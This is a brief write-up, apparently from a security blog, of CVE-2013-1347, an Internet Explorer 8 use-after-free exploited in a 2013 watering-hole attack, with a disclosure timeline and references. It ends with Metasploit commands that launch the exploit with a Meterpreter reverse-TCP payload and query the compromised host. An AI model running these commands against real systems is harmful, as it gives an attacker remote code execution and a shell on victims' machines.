Timeline :
Watering hole campaign first reported on a private mailing list the 2013-04-30
Watering hole campaign publicly disclosed by AlienVault and Invincea the 2013-04-30
0day exploit spotted by FireEye the 2013-05-03
Microsoft Security Advisory posted the 2013-05-03
Metasploit PoC provided the 2013-05-05
PoC provided by :
Unknown
EMH
juan vazquez
sinn3r
Reference(s) :
CVE-2013-1347
OSVDB-92993
MSA-2847140
Affected version(s) :
Internet Explorer 8
Tested on Windows XP Pro SP3 with :
Internet Explorer 8
Description :
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that’s controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) web site.
Commands :
use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.178.36 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit getuid sysinfo